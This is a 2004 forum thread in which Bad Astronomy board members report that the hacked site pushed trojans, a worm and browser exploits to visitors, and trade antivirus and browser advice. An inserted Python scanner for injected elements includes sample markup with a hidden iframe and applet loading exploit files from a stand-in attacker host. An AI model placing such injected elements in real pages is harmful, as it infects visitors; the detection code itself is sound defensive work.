BABB hacked: Virus inserted into all who viewed it.

Humphrey
2004-Nov-21, 09:12 PM
Please scan your hard drives. When coming up on the main BABB page Norton was screaming at me that I had many JavaScript/Java (not sure which) viruses trying to be installed on my system. And I'm using Mozilla/Netscape.

Be careful.

edit: It seems that the BA has responded and removed the trojan virus information. Hopefully he gets it all.

xbck1
2004-Nov-21, 09:22 PM
No, he hasn't. I'm having to go through other routes to post without having to worry about that dern Trojan. Luckily Norton picked it up and deleted it right away, but I'm still leery of it.

Humphrey
2004-Nov-21, 11:06 PM
Virus is still here.

TrAI
2004-Nov-21, 11:42 PM
Yes, AVG was warning me about the Byteverify trojan here, also every page seems to include a scripting exploit for IE, and I got a download attempt for some dialer not that long ago. I would advise people not to use IE (or at least go to the Windows Update site to get patches) while surfing the BABB until the problem is resolved. I deactivated Java (to stop the Byteverify downloads) and JavaScript (to stop the annoying "bad URL" warning about the scripting exploit) in Opera...

frogesque
2004-Nov-22, 12:31 AM
AVG warned me also, I did a scan with Trend Housecall and picked up 1 infected file. (I have Java scripts disabled)

Welcome back BA and thanks for the prompt action and the info posted on the main site page. =D>

The Bad Astronomer
2004-Nov-22, 12:34 AM
It should be fixed. I posted on "About the BABB".

Gullible Jones
2004-Nov-22, 12:35 AM
Good. I should be safe anyway, but on the off chance that someone's logging our keystrokes...

Moose
2004-Nov-22, 12:43 AM
Yeah, looks clean to me. No alerts on the way in. Cool.

Gullible Jones
2004-Nov-22, 12:47 AM
=D> \:D/ =D> \:D/ =D> \:D/ =D>

slinted
2004-Nov-22, 02:46 AM
I know the file download of "gdnUS990.exe" didn't go through on my machine, was this the one/only trojan file? Or were there more than one? I just wanted to make sure for myself and others that we could specifically make sure nothing was installed.

Colt
2004-Nov-22, 03:13 AM
For anyone interested and who might not have tried to access the site, this is what it looked like: http://img49.exs.cx/img49/6774/ba_hacked.png Those links, according to Vermonter, lead to some Russian site with more viruses. - Colt

Humphrey
2004-Nov-22, 03:16 AM
> I know the file download of "gdnUS990.exe" didn't go through on my machine, was this the one/only trojan file? Or were there more than one? I just wanted to make sure for myself and others that we could specifically make sure nothing was installed.

That was not the only thing. It also loaded a trojan virus through Java. I would still scan your hard drive since you might have that on there if your AV did not catch it.

Sever
2004-Nov-22, 03:24 AM
Good thing I was using Firefox. :o
But even if I did get a virus I had to reformat my HD...again...
But hopefully I should be able to play some HL2 tonight (and browse the BABB without fear).

ktesibios
2004-Nov-22, 03:29 AM
> For anyone interested and who might not have tried to access the site, this is what it looked like: http://img49.exs.cx/img49/6774/ba_hacked.png Those links, according to Vermonter, lead to some Russian site with more viruses. - Colt

The file that the hacked main page tried to trick the reader into downloading and running was identified by McAfee as the W32/Sdbot.worm.gen worm (McAfee's name; Symantec calls it w32.hllw.moega).

It's an ugly piece of work that besides doing the usual worm stuff (like acting as a backdoor, trying to propagate to other computers on the same subnet etc.) for some reason tries to steal CD keys for around a dozen popular games.

I also got the impression that that page was also trying to do a drive-by install of at least one porn dialer and possibly other spyware.

As far as up-to-date copies of McAfee Virus Scan and Spybot Search and Destroy can tell, I seem to have escaped acquiring any nasties. Anyone who was running Internet Exploder without good virus and spyware protection software might not have been so lucky.

Vandalism, physical or cyber, makes me really angry. I hope that the perpetrator winds up paying a suitable penalty.

Kesh
2004-Nov-22, 03:34 AM
This is one reason I love my Mac...

Still, it sucks that someone would resort to such shenanigans.

Yoshua
2004-Nov-22, 03:38 AM
> For anyone interested and who might not have tried to access the site, this is what it looked like: http://img49.exs.cx/img49/6774/ba_hacked.png Those links, according to Vermonter, lead to some Russian site with more viruses. - Colt
>
> The file that the hacked main page tried to trick the reader into downloading and running was identified by McAfee as the W32/Sdbot.worm.gen worm (McAfee's name; Symantec calls it w32.hllw.moega).
>
> It's an ugly piece of work that besides doing the usual worm stuff (like acting as a backdoor, trying to propagate to other computers on the same subnet etc.) for some reason tries to steal CD keys for around a dozen popular games.
>
> I also got the impression that that page was also trying to do a drive-by install of at least one porn dialer and possibly other spyware.
>
> As far as up-to-date copies of McAfee Virus Scan and Spybot Search and Destroy can tell, I seem to have escaped acquiring any nasties. Anyone who was running Internet Exploder without good virus and spyware protection software might not have been so lucky.
>
> Vandalism, physical or cyber, makes me really angry. I hope that the perpetrator winds up paying a suitable penalty.

Unfortunately, they probably won't. Might get someone in trouble with their ISP if the ISP is cooperative and sympathetic. About the best we're likely to get is having the offender's site blocked at BA's ISP.

Feds won't get involved with anything that doesn't show like six-figure damages. Even then, if the person who did this was overseas, there is little the FBI could do anyways.

I hate to be bleak about it, but there's a reason this kind of thing is so common and why we must all use firewall and anti-virus software (other than the fact that the hacks at M$ can't be bothered to secure Windows).

crateris
2004-Nov-22, 04:08 AM
Just out of curiosity, would that virus affect someone using a Mac (using IE)? I didn't click on the link as it was for Windows 98 (I think, anyway).

BTW, www.chemtrailcentral.com is having problems, also.

Maybe a conspiracy??

8-[

C.

Yoshua
2004-Nov-22, 04:37 AM
> Just out of curiosity, would that virus affect someone using a Mac (using IE)? I didn't click on the link as it was for Windows 98 (I think, anyway).
>
> BTW, www.chemtrailcentral.com is having problems, also.
>
> Maybe a conspiracy??
>
> 8-[
>
> C.

Not unless it executed code the Mac could actually run that exploited some flaw in Mac OS security. If you're running Mac OS X, that isn't bloody likely.

Most virii target windows, it's an easy target.

crateris
2004-Nov-22, 04:41 AM
>> Just out of curiosity, would that virus affect someone using a Mac (using IE)? I didn't click on the link as it was for Windows 98 (I think, anyway).
>>
>> BTW, www.chemtrailcentral.com is having problems, also.
>>
>> Maybe a conspiracy??
>>
>> 8-[
>>
>> C.
>
> Not unless it executed code the Mac could actually run that exploited some flaw in Mac OS security. If you're running Mac OS X, that isn't bloody likely.
>
> Most virii target windows, it's an easy target. :lol:

Thanks for the info. I'm running OS 9. No self-respecting Windows hacker would dirty his hands on that!

Virii. I like that. Kinda like focii.

C.

Postmortem
2004-Nov-22, 04:56 AM
Don't think you're immune just because you're running Firefox. I am, and I still got hit. Of course my firewall [ZoneAlarm] has been acting up and I had to shut it off to surf, but I figured this site would be safe.

By the way, anyone have any recommendations for a better firewall than ZoneAlarm? I have always had trouble with it blocking internet access after I leave my computer running for some time, and no, I don't have the auto lock on; it just locks out all service after a while if I'm not currently online. I have had this problem with ZA for a long time and with multiple versions, but have still been using it because it's better than spending all my time removing viruses and spyware.

PhantomWolf
2004-Nov-22, 05:52 AM
> Most virii target windows, it's an easy target.

It's not so much an easy target as a fat one because if you want to do damage to a lot of systems you go after the one that has 90% of the market, not the one that has 1%. If Linux had more users, then it'd have more hackers.

As to being in danger, nah, I'm running 98SE, IE 6.0, Norton AV for Win 95 (updated as of the 20th Nov 2004), Adaware 6.0 (updated as of today), and ZoneAlarm 5.5. Norton picked up and prevented the Trojan attacks and I'm still yet to have anything serious happen to my computer. The only virus I have ever had I got from work before I knew they had it.

tofu
2004-Nov-22, 12:31 PM
> Good thing I was using Firefox.

I was just about to say that. Why do people stay with IE?? Firefox is free guys. Opera is free. Come on. Save IE for that 1/1000 site that doesn't work right with mozilla. Or better yet just avoid those sites because it's obvious the developers don't care.

If you spend any time on the internet you are going to run into hacked sites like we had yesterday. Whatever you may think of IE (and you're probably wrong, it's not faster, it doesn't have more features) you'll be sorry when you hit a hacked site and get a virus.

frogesque
2004-Nov-22, 12:48 PM
Well, I downloaded Firefox some time ago and it just plain don't work. I either get errors and it shuts down or I get site not found when I know full well that the site(s) are OK.

Not impressed with it, does it uninstall OK?

Edit: CAN you uninstall it - there doesn't seem to be an option to do that?

Maksutov
2004-Nov-22, 12:57 PM
> Well, I downloaded Firefox some time ago and it just plain don't work. I either get errors and it shuts down or I get site not found when I know full well that the site(s) are OK.
>
> Not impressed with it, does it uninstall OK?
>
> Edit: CAN you uninstall it - there doesn't seem to be an option to do that?

Sorry to hear about your experience with Firefox. I've been using it since it was Firebird, and have had nothing but good experiences. Firefox is like a Benz, IE is like a Pinto.

Perhaps your installation didn't go that well. Maybe an uninstall and reinstall would be in order. What's your OS? Did you terminate all running processes during the install? Did you do a scan prior to install? Did you have administrative privileges to install? Etc...

iFire
2004-Nov-22, 01:21 PM
I love Symantec Anti-Virus. :D *hugs it*

Wally
2004-Nov-22, 01:54 PM
Uh oh!! Just received a handful of messages from Norton stating a trojan was detected and successfully quarantined. Looks like this SOB is back! :evil:

iFire
2004-Nov-22, 01:56 PM
> Uh oh!! Just received a handful of messages from Norton stating a trojan was detected and successfully quarantined. Looks like this SOB is back! :evil:

Yea, I'm getting it too. Let's find who it is and kill 'em. :evil:

tofu
2004-Nov-22, 01:57 PM
> It's not so much an easy target as a fat one because if you want to do damage to a lot of systems you go after the one that has 90% of the market, not the one that has 1%. If Linux had more users, then it'd have more hackers.

Well, Apache webserver has a larger share of the market than Microsoft IIS, yet IIS has more vulnerabilities.

The common thread seems to be Microsoft, not market share.

tofu
2004-Nov-22, 02:00 PM
I'm not sure if the BA will read this thread, but here is a recent bugtraq entry on PHPBB2:

http://www.securityfocus.com/archive/1/381555/2004-11-19/2004-11-25/0

Are you running "Cash Mod" or is your ISP running it? That might be how the hackers got in.

Ut
2004-Nov-22, 02:52 PM
>> It's not so much an easy target as a fat one because if you want to do damage to a lot of systems you go after the one that has 90% of the market, not the one that has 1%. If Linux had more users, then it'd have more hackers.
>
> Well, Apache webserver has a larger share of the market than Microsoft IIS, yet IIS has more vulnerabilities.
>
> The common thread seems to be Microsoft, not market share.

Yes, MS products are more vulnerable. That doesn't defeat the argument that if Linux had a 90% market share, it'd be bombarded with viruses, too, though.

Besides, the only people using linux are those who know how to clean or avoid the bugs, anyway.

Firefox keeps whining about a missing plugin. *sigh* Ahh well. Time for another scan.

Tranquility
2004-Nov-22, 03:02 PM
Guys, the board is still infected. Be careful. Norton is screaming bloody murder.

Humphrey
2004-Nov-22, 03:09 PM
Turn off Java.

frogesque
2004-Nov-22, 03:11 PM
Yep, I have. I seem to have been re-infected despite all precautions, unless Panda has picked up something different. It cleared the problem but then IE crashed so I can't get details. 2nd run is progressing OK, 51k files checked and all clear so far.

BTW Humphrey, I have Java off permanently to aid in blocking ads. I've only had 2 infected files but still checking.

JFM
2004-Nov-22, 03:41 PM
"D:\DOCUMENTS AND SETTINGS\JFM\APPLICATION DATA\SUN\JAVA\DEPLOYMENT\CACHE\JAVAPI\V1.0\JAR\CLASSLOAD.JAR-568F1B37-3F5D2808.ZIP

The Trojan horse TR/ClassLder.c.Java"

Several variants of this have just tried to access my comp'. I have tried all my browsers, I mainly use Mozilla 1.7.3. But it also tried with IE, Firefox, Opera and Avant.

So the script kiddies are realising, these days just using IE exploits ain't good enough.

Tero
2004-Nov-22, 04:11 PM
I use Safari on Mac OS X and I keep getting these files named 2DimensionOfExploitsEnc-1.php, 2DimensionOfExploitsEnc-2.php, and so on. There's still something wrong.

Reacher
2004-Nov-22, 04:14 PM
eTrust Antivirus is complaining at me about several (maybe 6 or so) files in my Temporary internet files that are apparently trojans, for example the HTML.MHTMLRedir.exploit trojan. I know what a trojan is, and that's about the extent of my knowledge. Is this the virus/viruses in question, or did I pick this up somewhere else?

Also, how do I turn off Java?

And yes, I was using IE... I shall be making Firefox my primary browser.

As soon as I work out how.

DreadCthulhu
2004-Nov-22, 04:21 PM
>> Most virii target windows, it's an easy target.
>
> It's not so much an easy target as a fat one because if you want to do damage to a lot of systems you go after the one that has 90% of the market, not the one that has 1%. If Linux had more users, then it'd have more hackers.

I disagree. Linux is inherently more secure. Just compare Apache webservers (open source, mostly running on Linux) versus Microsoft IIS hacks: Apache has about double the market share of Microsoft IIS, yet IIS is hacked much more often. While Linux would certainly have more hackers than it does now if it had 50% of the market, the exploit level still wouldn't match Microsoft's, due to the better security model.

Also note, almost every home Windows XP box is running in Admin mode, while almost every Linux distro strongly warns against running in root, and has you use a limited account.

And besides, it's hard enough to install programs in Linux on purpose; having it done by a little script like that - :lol: :lol:

frogesque
2004-Nov-22, 04:22 PM
Reacher, I'm on Win98 so this may not be exactly right for you.

Path for Win98

Start > Settings > Control Panel > Java Plugins > Browser . Uncheck for all browsers set as default Java run time.

Also a good idea to go to the Cache tab and clear.

Roving Philosopher
2004-Nov-22, 04:58 PM
> [snip]
>
> By the way, anyone have any recommendations for a better firewall than ZoneAlarm? I have always had trouble with it blocking internet access after I leave my computer running for some time, and no, I don't have the auto lock on; it just locks out all service after a while if I'm not currently online. I have had this problem with ZA for a long time and with multiple versions, but have still been using it because it's better than spending all my time removing viruses and spyware.

I use TrendMicro PC-cillin Internet Security. I've had no viruses, no spyware (it caught and quarantined the bug here), and for the most part, I'm not even aware it's there. I'm not sure how easy it is to make detailed configuration changes (like setting up specific firewall rules), since I've never actually tried. I've been running it with default settings, and I've had no complaints.

zebo-the-fat
2004-Nov-22, 05:07 PM
I have only been using Firefox for a day or two (looks good so far), but now when I access the BB I get a box saying I need to install extra plugins to view all the media on the page. Since I can see everything (I think) I assume that it's just the work of our evil trojan. Has anyone else had this? :(

mid
2004-Nov-22, 05:23 PM
You can see everything except that little dead square above and to the left of the "Bad Astronomy Bulletin Board Forum Index ->" link. Which contains both the infectious Java (being Java, wouldn't that make Macs vulnerable, too?) and the requirement for the plugin. I'm now trying to work out how to make Firefox stop asking me to install it...
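An added example, not code from the thread or from the forum software: a small Python scanner for the kind of injected element described above (a near-invisible applet/object/iframe, or active content fetched from a host other than the site's own), run over a constructed sample page with placeholder hostnames.

```python
"""Flag injected active-content elements in a saved HTML page.

Added example, not code from the thread or the forum software. It looks
for the kind of element the posts describe: a near-invisible applet/object/
iframe wedged into the page, or active content pulled from a host other
than the site's own. Hostnames and the sample page below are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags that run code or pull in a foreign document.
ACTIVE_TAGS = {"applet", "object", "embed", "iframe", "frame", "script"}
# Attributes through which those tags reference external content.
SRC_ATTRS = ("src", "code", "codebase", "data", "archive")


def _tiny(value):
    """True for a width/height of two pixels or less, e.g. '1' or '0px'."""
    if value is None:
        return False
    digits = value.strip().lower().removesuffix("px")
    return digits.isdigit() and int(digits) <= 2


class InjectedElementFinder(HTMLParser):
    """Collect (tag, line, reasons) for every suspicious active element."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ACTIVE_TAGS:
            return
        a = {name: (value or "") for name, value in attrs}
        reasons = []
        # Plugin content of any kind is out of place on a plain forum page.
        if tag in ("applet", "embed", "object"):
            reasons.append(f"active <{tag}> element present")
        # Content fetched from somewhere other than the site itself.
        for attr in SRC_ATTRS:
            host = urlparse(a.get(attr, "")).hostname
            if host and host.lower() != self.site_host:
                reasons.append(f"{attr} points off-site to {host}")
        # A one-pixel "dead square" the visitor is not meant to notice.
        if tag != "script" and _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append(f"hidden size {a['width']}x{a['height']}")
        if reasons:
            self.findings.append((tag, self.getpos()[0], reasons))


def scan_page(html, site_host):
    """Return the list of suspicious elements found in html for site_host."""
    finder = InjectedElementFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample: ordinary forum markup plus an injected block like the
# one described in the thread. attacker.invalid is a placeholder host.
SAMPLE_HTML = """<html><head><title>Forum</title>
<script src="http://forum.example/templates/menu.js"></script></head><body>
<iframe src="http://attacker.invalid/2DimensionOfExploitsEnc-1.php"
        width="1" height="1" frameborder="0"></iframe>
<applet code="Counter.class" archive="http://attacker.invalid/classload.jar"
        width="1" height="1"></applet>
<a href="index.php">Bad Astronomy Bulletin Board Forum Index -></a>
<img src="images/logo.gif"></body></html>"""

if __name__ == "__main__":
    for tag, line, reasons in scan_page(SAMPLE_HTML, "forum.example"):
        print(f"line {line}: <{tag}> -- " + "; ".join(reasons))
```

The site's own script is left alone; only the off-site, one-pixel iframe and applet are reported.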

Yoshua
2004-Nov-22, 05:45 PM
> You can see everything except that little dead square above and to the left of the "Bad Astronomy Bulletin Board Forum Index ->" link. Which contains both the infectious Java (being Java, wouldn't that make Macs vulnerable, too?) and the requirement for the plugin. I'm now trying to work out how to make Firefox stop asking me to install it...

No, Java is just being used as the delivery mechanism. The exploit is x86 specific, Macs use an entirely different machine architecture. It's the same reason you can't run a PC game on a Mac (barring the use of emulation software).

Don't buy in to the M$ FUD. They'd like you to think that their system is only more vulnerable because it is used on more desktops. That is part of it, but the bigger reason is simply that Windows is a far easier target.

Windows is a monolithic operating system. Everything is wrapped up together. When one piece is compromised, the whole thing goes. Linux is modular, if one piece is compromised, the rest of the system can still function.

Windows has very primitive access controls. And by default they're set to allow users access to everything. Linux on the other hand provides very strict access to parts of the system not just by user but by application as well.

Even if someone managed to compromise a Linux user, all they would likely gain access to is that user's home directory. They would have no ability to write in any of the system areas which makes writing a malicious virus to infect Linux a very difficult task (I'd say impossible, but I can't with certainty).

Attacks on Linux users would be an annoyance at worst. You'd just change to single user mode, login as root, un-do whatever changes the person made to your directory (basically, you copy some files from a backup). But someone even getting that far is a real trial to say the least. The only way someone could hurt a Linux user would be to gain root access, and that can be made restricted to only users with physical access to the machine, or slightly broader to include people only on your own network.

The Windows method. If you're lucky, it's something your virus scanner picks up on and removes. If it's something your virus scanner doesn't recognize, you could easily be looking at having to format your hard drive and re-install, losing a lot of saved data.

Still, I wind up using windows because I like gaming. I am just sure to not keep any critical data on my windows box.

latimer
2004-Nov-22, 05:47 PM
Hello,

I, too, am getting my virus warning on every page; so the threat must be common to all pages being loaded (perhaps one of the graphics?)

McAfee calls it Exploit-MhtRedir.gen; and it comes down into one of the temporary internet files.

Hope you find them, BA.

Jonathan
-It doesn't matter yadda yadda-

electromagneticpulse
2004-Nov-22, 07:01 PM
I still use evil ol' IE, I know all the tricks with it. Hate the damn search bars that get installed sometimes... saying that, I'm fighting a war with an adsrve program which hyperlinks words. I'm not sure how I got it as I never downloaded anything #-o I still can't get javascripts to run :evil:

Edit: just got them working again 8) (didn't type that one)

Crashtest
2004-Nov-22, 07:15 PM
Just thought I would run my paranoia by the experts on the page here (not experts in paranoia, but in the virus attack 8-[ ). I just started using Firefox literally last night and I, even after reading all about the virus, clicked on the plugin note #-o . I don't think I downloaded anything since it said no appropriate plugins were found, but I wanted to make sure I am in the clear with all of this. I have my Norton running a full scan just to be sure and I think I cleared out my Java cache.... so far no hidden friends have been found, but I just want to make sure I am not about to have my computer melt on me. Thank you all in advance for any info you might have. :D

CTM VT 2K
2004-Nov-22, 07:36 PM
> ... so far no hidden friends have been found, but I just want to make sure I am not about to have my computer melt on me. Thank you all in advance for any info you might have. :D

Well, I wouldn't expect your computer to melt on you (that would require a fair amount of heat - most likely secondary to some variety of combustion not directly related to your brush-with-virii). :lol:

So long as you run an up-to-date Anti-Virus, and use some sort of Spyware/Adware detector remover, you should be fine. I use Norton, Spybot and Ad-Aware. Granted, I have them all configured for Ultimate Paranoid (My computer has been known to corner people and torture them until they admit to being a really advanced form of spyware). I also use Opera, with similarly configured settings. Not tried Firefox - I moved to Opera from IE before I heard about Firefox. Not worth my time to convert to Firefox... maybe on my next computer. :-k

Wally
2004-Nov-22, 07:52 PM
Has anyone PM'd Phil to let him know we've been re-infected?

kucharek
2004-Nov-22, 07:55 PM
> Has anyone PM'd Phil to let him know we've been re-infected?

I did and he already fixed it (http://www.badastronomy.com/phpBB/viewtopic.php?p=369161#369161).
Or do we have a third attack? :o

Tero
2004-Nov-22, 08:02 PM
> I use Safari on Mac OS X and I keep getting these files named 2DimensionOfExploitsEnc-1.php, 2DimensionOfExploitsEnc-2.php, and so on. There's still something wrong.

And now it's been fixed, at least I'm not getting those files anymore.

mid
2004-Nov-23, 10:47 AM
All clean here, too.

Wally
2004-Nov-23, 01:34 PM
I received the virus warning again this morning when I accessed the main website, but have not received it since coming to the board. I posted this info on the BAD, BAD forum listed in Kucharek's post above as well.

Glom
2004-Nov-23, 03:43 PM
Same here. There was a warning posted recently at AH reporting problems for a third time, so I bypassed the main site and went directly to the board without incident. I think it's just the main site that has problems at the moment.

This is going to be a real setback for BA's campaign to convince us that there's a website attached to this bulletin board. :)

electromagneticpulse
2004-Nov-23, 04:11 PM
> This is going to be a real setback for BA's campaign to convince us that there's a website attached to this bulletin board. :)

Web... Site? #-o

Moose
2004-Nov-23, 05:18 PM
Okay, I had a look. Main page and a few random (static) sub pages all seem to be clear for now. I've detected no hostile page elements.